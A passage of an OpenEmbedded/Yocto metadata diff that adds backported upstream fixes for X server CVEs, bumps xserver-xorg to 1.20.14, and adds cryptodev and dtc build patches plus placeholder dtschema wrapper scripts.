+- XISendDeviceHierarchyEvent(flags);
++ if (changes != NO_CHANGE)
++ XISendDeviceHierarchyEvent(flags);
+ return rc;
+ }
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
new file mode 100644
index 0000000000..1e1c782963
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
@@ -0,0 +1,74 @@
+From bc1fdbe46559dd947674375946bbef54dd0ce36b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Jos=C3=A9=20Exp=C3=B3sito?= <jexposit@redhat.com>
+Date: Fri, 22 Dec 2023 18:28:31 +0100
+Subject: [PATCH] Xi: do not keep linked list pointer during recursion
+
+The `DisableDevice()` function is called whenever an enabled device
+is disabled and it moves the device from the `inputInfo.devices` linked
+list to the `inputInfo.off_devices` linked list.
+
+However, its link/unlink operation has an issue during the recursive
+call to `DisableDevice()` due to the `prev` pointer pointing to a
+removed device.
+
+This issue leads to a length mismatch between the total number of
+devices and the number of devices in the list, leading to a heap
+overflow and, possibly, to local privilege escalation.
+
+Simplify the code that checked whether the device passed to
+`DisableDevice()` was in `inputInfo.devices` or not and find the
+previous device after the recursion.
+
+CVE-2024-21886, ZDI-CAN-22840
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index dca98c8d1b..389d28a23c 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -453,14 +453,20 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ {
+ DeviceIntPtr *prev, other;
+ BOOL enabled;
++ BOOL dev_in_devices_list = FALSE;
+ int flags[MAXDEVICES] = { 0 };
+
+ if (!dev->enabled)
+ return TRUE;
+
+- for (prev = &inputInfo.devices;
+- *prev && (*prev != dev); prev = &(*prev)->next);
+- if (*prev != dev)
++ for (other = inputInfo.devices; other; other = other->next) {
++ if (other == dev) {
++ dev_in_devices_list = TRUE;
++ break;
++ }
++ }
++
++ if (!dev_in_devices_list)
+ return FALSE;
+
+ TouchEndPhysicallyActiveTouches(dev);
+@@ -511,6 +517,9 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ LeaveWindow(dev);
+ SetFocusOut(dev);
+
++ for (prev = &inputInfo.devices;
++ *prev && (*prev != dev); prev = &(*prev)->next);
++
+ *prev = dev->next;
+ dev->next = inputInfo.off_devices;
+ inputInfo.off_devices = dev;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
new file mode 100644
index 0000000000..af607df4f0
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
@@ -0,0 +1,57 @@
+From 26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Fri, 5 Jan 2024 09:40:27 +1000
+Subject: [PATCH] dix: when disabling a master, float disabled slaved devices
+ too
+
+Disabling a master device floats all slave devices but we didn't do this
+to already-disabled slave devices. As a result those devices kept their
+reference to the master device resulting in access to already freed
+memory if the master device was removed before the corresponding slave
+device.
+
+And to match this behavior, also forcibly reset that pointer during
+CloseDownDevices().
+
+Related to CVE-2024-21886, ZDI-CAN-22840
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index 389d28a23c..84a6406d13 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -483,6 +483,13 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ flags[other->id] |= XISlaveDetached;
+ }
+ }
++
++ for (other = inputInfo.off_devices; other; other = other->next) {
++ if (!IsMaster(other) && GetMaster(other, MASTER_ATTACHED) == dev) {
++ AttachDevice(NULL, other, NULL);
++ flags[other->id] |= XISlaveDetached;
++ }
++ }
+ }
+ else {
+ for (other = inputInfo.devices; other; other = other->next) {
+@@ -1088,6 +1095,11 @@ CloseDownDevices(void)
+ dev->master = NULL;
+ }
+
++ for (dev = inputInfo.off_devices; dev; dev = dev->next) {
++ if (!IsMaster(dev) && !IsFloating(dev))
++ dev->master = NULL;
++ }
++
+ CloseDeviceList(&inputInfo.devices);
+ CloseDeviceList(&inputInfo.off_devices);
+
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
new file mode 100644
index 0000000000..da735efb2b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
@@ -0,0 +1,49 @@
+From 96798fc1967491c80a4d0c8d9e0a80586cb2152b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:51:45 -0700
+Subject: [PATCH] Xi: ProcXIGetSelectedEvents needs to use unswapped length to
+ send reply
+
+CVE-2024-31080
+
+Reported-by: https://debbugs.gnu.org/cgi/bugreport.cgi?bug=69762
+Fixes: 53e821ab4 ("Xi: add request processing for XIGetSelectedEvents.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/96798fc1967491c80a4d0c8d9e0a80586cb2152b]
+CVE: CVE-2024-31080
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xiselectev.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xiselectev.c b/Xi/xiselectev.c
+index edcb8a0d36..ac14949871 100644
+--- a/Xi/xiselectev.c
++++ b/Xi/xiselectev.c
+@@ -349,6 +349,7 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ InputClientsPtr others = NULL;
+ xXIEventMask *evmask = NULL;
+ DeviceIntPtr dev;
++ uint32_t length;
+
+ REQUEST(xXIGetSelectedEventsReq);
+ REQUEST_SIZE_MATCH(xXIGetSelectedEventsReq);
+@@ -418,10 +419,12 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIGetSelectedEvents swaps it */
++ length = reply.length;
+ WriteReplyToClient(client, sizeof(xXIGetSelectedEventsReply), &reply);
+
+ if (reply.num_masks)
+- WriteToClient(client, reply.length * 4, buffer);
++ WriteToClient(client, length * 4, buffer);
+
+ free(buffer);
+ return Success;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
new file mode 100644
index 0000000000..d2c551a0e5
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
@@ -0,0 +1,47 @@
+From 3e77295f888c67fc7645db5d0c00926a29ffecee Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:56:27 -0700
+Subject: [PATCH] Xi: ProcXIPassiveGrabDevice needs to use unswapped length to
+ send reply
+
+CVE-2024-31081
+
+Fixes: d220d6907 ("Xi: add GrabButton and GrabKeysym code.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/3e77295f888c67fc7645db5d0c00926a29ffecee]
+CVE: CVE-2024-31081
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xipassivegrab.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index c9ac2f8553..896233bec2 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -93,6 +93,7 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ GrabParameters param;
+ void *tmp;
+ int mask_len;
++ uint32_t length;
+
+ REQUEST(xXIPassiveGrabDeviceReq);
+ REQUEST_FIXED_SIZE(xXIPassiveGrabDeviceReq,
+@@ -247,9 +248,11 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIPassiveGrabDevice swaps it */
++ length = rep.length;
+ WriteReplyToClient(client, sizeof(rep), &rep);
+ if (rep.num_modifiers)
+- WriteToClient(client, rep.length * 4, modifiers_failed);
++ WriteToClient(client, length * 4, modifiers_failed);
+
+ out:
+ free(modifiers_failed);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
new file mode 100644
index 0000000000..04a6e734ef
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
@@ -0,0 +1,61 @@
+require xserver-xorg.inc
+
+SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
+ file://pkgconfig.patch \
+ file://0001-test-xtest-Initialize-array-with-braces.patch \
+ file://sdksyms-no-build-path.patch \
+ file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
+ file://CVE-2022-3550.patch \
+ file://CVE-2022-3551.patch \
+ file://CVE-2022-3553.patch \
+ file://CVE-2022-4283.patch \
+ file://CVE-2022-46340.patch \
+ file://CVE-2022-46341.patch \
+ file://CVE-2022-46342.patch \
+ file://CVE-2022-46343.patch \
+ file://CVE-2022-46344.patch \
+ file://CVE-2023-0494.patch \
+ file://CVE-2023-1393.patch \
+ file://CVE-2023-5367.patch \
+ file://CVE-2023-5380.patch \
+ file://CVE-2023-6377.patch \
+ file://CVE-2023-6478.patch \
+ file://CVE-2023-6816.patch \
+ file://CVE-2024-0229-1.patch \
+ file://CVE-2024-0229-2.patch \
+ file://CVE-2024-0229-3.patch \
+ file://CVE-2024-0229-4.patch \
+ file://CVE-2024-21885.patch \
+ file://CVE-2024-21886-1.patch \
+ file://CVE-2024-21886-2.patch \
+ file://CVE-2024-0408.patch \
+ file://CVE-2024-0409.patch \
+ file://CVE-2024-31081.patch \
+ file://CVE-2024-31080.patch \
+"
+SRC_URI[md5sum] = "453fc86aac8c629b3a5b77e8dcca30bf"
+SRC_URI[sha256sum] = "54b199c9280ff8bf0f73a54a759645bd0eeeda7255d1c99310d5b7595f3ac066"
+
+CFLAGS += "-fcommon"
+
+# These extensions are now integrated into the server, so declare the migration
+# path for in-place upgrades.
+
+RREPLACES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RPROVIDES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RCONFLICTS_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
deleted file mode 100644
index 51d959f86c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
+++ /dev/null
@@ -1,38 +0,0 @@
-require xserver-xorg.inc
-
-SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
- file://pkgconfig.patch \
- file://0001-test-xtest-Initialize-array-with-braces.patch \
- file://sdksyms-no-build-path.patch \
- file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
- file://CVE-2020-14347.patch \
- file://CVE-2020-14346.patch \
- file://CVE-2020-14361.patch \
- file://CVE-2020-14362.patch \
- "
-SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839"
-SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146"
-
-CFLAGS += "-fcommon"
-
-# These extensions are now integrated into the server, so declare the migration
-# path for in-place upgrades.
-
-RREPLACES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RPROVIDES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RCONFLICTS_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
diff --git a/meta/recipes-kernel/blktrace/blktrace_git.bb b/meta/recipes-kernel/blktrace/blktrace_git.bb
index 6903053b5b..2110bc75fa 100644
--- a/meta/recipes-kernel/blktrace/blktrace_git.bb
+++ b/meta/recipes-kernel/blktrace/blktrace_git.bb
@@ -1,4 +1,9 @@
SUMMARY = "Generates traces of I/O traffic on block devices"
+DESCRIPTION = "blktrace is a block layer IO tracing mechanism which provides \
+detailed information about request queue operations up to user space. There \
+are three major components: a kernel component, a utility to record the i/o \
+trace information from the kernel to user space, and utilities to analyse and \
+view the trace information."
HOMEPAGE = "http://brick.kernel.dk/snaps/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
@@ -9,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e"
PV = "1.2.0+git${SRCPV}"
-SRC_URI = "git://git.kernel.dk/blktrace.git \
+SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \
file://ldflags.patch \
file://CVE-2018-10689.patch \
file://make-btt-scripts-python3-ready.patch \
diff --git a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
index 552eb6abaa..d7c7918515 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
+++ b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
@@ -9,6 +9,9 @@ DEPENDS += "cryptodev-linux"
SRC_URI += " \
file://0001-Disable-installing-header-file-provided-by-another-p.patch \
+file://0001-Fix-build-for-Linux-5.8-rc1.patch \
+file://0001-Fix-build-for-Linux-5.9-rc1.patch \
+file://fix-build-for-Linux-5.11-rc1.patch \
"
EXTRA_OEMAKE='KERNEL_DIR="${STAGING_KERNEL_DIR}" PREFIX="${D}"'
diff --git a/meta/recipes-kernel/cryptodev/cryptodev.inc b/meta/recipes-kernel/cryptodev/cryptodev.inc
index f99f8bc9f0..f02619cabe 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev.inc
+++ b/meta/recipes-kernel/cryptodev/cryptodev.inc
@@ -1,9 +1,14 @@
HOMEPAGE = "http://cryptodev-linux.org/"
+DESCRIPTION = "Cryptodev-linux is a device that allows access to Linux kernel \
+cryptographic drivers, thus allowing userspace applications to take advantage \
+of hardware accelerators. Cryptodev-linux is implemented as a standalone \
+module that requires no dependencies other than a stock Linux kernel. Its \
+API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \
+SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \
"
SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b"
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
new file mode 100644
index 0000000000..02c721a4f3
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
@@ -0,0 +1,49 @@
+From 9e765068582aae3696520346a7500322ca6cc2de Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Sat, 13 Jun 2020 19:46:44 +0200
+Subject: [PATCH] Fix build for Linux 5.8-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9740ca4e95b43b91a4a848694a20d01ba6818f7b
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=da1c55f1b272f4bd54671d459b39ea7b54944ef9
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d8ed45c5dcd455fc5848d47f86883a1b872ac0d0
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [9e765068582aae3696520346a7500322ca6cc2de]
+
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+---
+ zc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/zc.c b/zc.c
+index ae464ff..2c286bb 100644
+--- a/zc.c
++++ b/zc.c
+@@ -58,7 +58,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ return 0;
+ }
+
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ down_read(&mm->mmap_sem);
++#else
++ mmap_read_lock(mm);
++#endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 6, 0))
+ ret = get_user_pages(task, mm,
+ (unsigned long)addr, pgcount, write, 0, pg, NULL);
+@@ -74,7 +78,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
+ #endif
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
++#else
++ mmap_read_unlock(mm);
++#endif
+ if (ret != pgcount)
+ return -EINVAL;
+
+--
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
new file mode 100644
index 0000000000..cf1c04df9e
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
@@ -0,0 +1,42 @@
+From 2f5e08aebf9229599aae7f25db752f74221cd71d Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Fri, 14 Aug 2020 00:13:38 +0200
+Subject: [PATCH] Fix build for Linux 5.9-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64019a2e467a288a16b65ab55ddcbf58c1b00187
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce617edecada007aee8610fbe2c14d10b8de2f6
+ https://lore.kernel.org/lkml/CAHk-=wj_V2Tps2QrMn20_W0OJF9xqNh52XSGA42s-ZJ8Y+GyKw@mail.gmail.com/
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/2f5e08aebf9229599aae7f25db752f74221cd71d]
+
+Signed-off-by: Naveen Saini <naveen.kumar.saini@intel.com>
+
+---
+ zc.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/zc.c b/zc.c
+index a560db5..fdf7da1 100644
+--- a/zc.c
++++ b/zc.c
+@@ -76,10 +76,14 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 9, 0))
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
++#else
++ ret = get_user_pages_remote(mm,
++ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
++ pg, NULL, NULL);
+ #endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
+--
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
new file mode 100644
index 0000000000..3ae77cb9d6
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
@@ -0,0 +1,32 @@
+From 55c6315058fc0dd189ffd116f2cc27ba4fa84cb6 Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Mon, 28 Dec 2020 01:41:31 +0100
+Subject: [PATCH] Fix build for Linux 5.11-rc1
+
+ksys_close was removed, as far as I can tell, close_fd replaces it.
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8760c909f54a82aaa6e76da19afe798a0c77c3c3
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1572bfdf21d4d50e51941498ffe0b56c2289f783
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/55c6315058fc0dd189ffd116f2cc27ba4fa84cb6]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+---
+ ioctl.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/ioctl.c b/ioctl.c
+index 3d332380..95481d4f 100644
+--- a/ioctl.c
++++ b/ioctl.c
+@@ -871,8 +871,10 @@ cryptodev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg_)
+ if (unlikely(ret)) {
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 17, 0))
+ sys_close(fd);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0))
+ ksys_close(fd);
++#else
++ close_fd(fd);
+ #endif
+ return ret;
+ }
diff --git a/meta/recipes-kernel/dtc/dtc.inc b/meta/recipes-kernel/dtc/dtc.inc
index 0650e3c82e..461ab8fbd3 100644
--- a/meta/recipes-kernel/dtc/dtc.inc
+++ b/meta/recipes-kernel/dtc/dtc.inc
@@ -5,9 +5,11 @@ SECTION = "bootloader"
LICENSE = "GPLv2 | BSD"
DEPENDS = "flex-native bison-native"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \
file://make_install.patch \
+ file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \
"
+
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)"
EXTRA_OEMAKE='NO_PYTHON=1 PREFIX="${prefix}" LIBDIR="${libdir}" DESTDIR="${D}"'
diff --git a/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
new file mode 100644
index 0000000000..a2deb12d4b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
@@ -0,0 +1,36 @@
+From f0119060ef1b9bd80e2cae487df1e4aedffb0e9b Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Fri, 22 Jan 2021 09:12:48 +0200
+Subject: [PATCH] dtc: Fix Makefile to add CFLAGS not override
+
+The Makefile overrides CFLAGS instead of extending them, so some of them go
+missing. The sources build out of the kernel tree and probably not all
+options can be used (?). We need at least -fmacro-prefix-map/
+debug-prefix-map to eliminate absolute paths in binaries.
+
+Upstream-Status: Pending
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ Makefile | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index 35d936f..b5b13cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -20,10 +20,10 @@ CONFIG_LOCALVERSION =
+ # See libfdt_internal.h for details
+ ASSUME_MASK ?= 0
+
+-CPPFLAGS = -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
++CPPFLAGS += -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
+ WARNINGS = -Wall -Wpointer-arith -Wcast-qual -Wnested-externs \
+ -Wstrict-prototypes -Wmissing-prototypes -Wredundant-decls -Wshadow
+-CFLAGS = -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
++CFLAGS += -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
+
+ BISON = bison
+ LEX = flex
+--
+2.25.1
+
diff --git a/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
new file mode 100644
index 0000000000..ec825cbf7b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
@@ -0,0 +1,35 @@
+From 4827e0db6c4f7dea7f4094f49d3bb48ef6dfdc2d Mon Sep 17 00:00:00 2001
+From: David Gibson <david@gibson.dropbear.id.au>
+Date: Wed, 6 Jan 2021 14:52:26 +1100
+Subject: [PATCH] fdtdump: Fix gcc11 warning
+
+In one place, fdtdump abuses fdt_set_magic(), passing it just a small char
+array instead of the full fdt header it expects. That's relying on the
+fact that fdt_set_magic() will only actually access the first 4
+bytes of the buffer.
+
+This trips a new warning in GCC 11 - and it's entirely possible it was
+always UB. So, don't do that.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/utils/dtc/dtc.git/patch/?id=ca16a723fa9dde9c5da80dba567f48715000e77c]
+Signed-off-by: David Gibson <david@gibson.dropbear.id.au>
+---
+ fdtdump.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fdtdump.c b/fdtdump.c
+index 9613bef..d9fb374 100644
+--- a/fdtdump.c
++++ b/fdtdump.c
+@@ -217,7 +217,7 @@ int main(int argc, char *argv[])
+ char *p = buf;
+ char *endp = buf + len;
+
+- fdt_set_magic(smagic, FDT_MAGIC);
++ fdt32_st(smagic, FDT_MAGIC);
+
+ /* poor man's memmem */
+ while ((endp - p) >= FDT_MAGIC_SIZE) {
+--
+2.30.1
+
diff --git a/meta/recipes-kernel/dtc/dtc_1.6.0.bb b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
index 92df70d9fc..a407137859 100644
--- a/meta/recipes-kernel/dtc/dtc_1.6.0.bb
+++ b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
@@ -5,6 +5,8 @@ LIC_FILES_CHKSUM = "file://GPL;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
SRCREV = "2525da3dba9beceb96651dc2986581871dbeca30"
+SRC_URI += "file://0001-fdtdump-Fix-gcc11-warning.patch"
+
S = "${WORKDIR}/git"
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
new file mode 100644
index 0000000000..2aa57851c7
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-doc-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-doc-validate.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
new file mode 100644
index 0000000000..24b89d8619
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-mk-schema wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
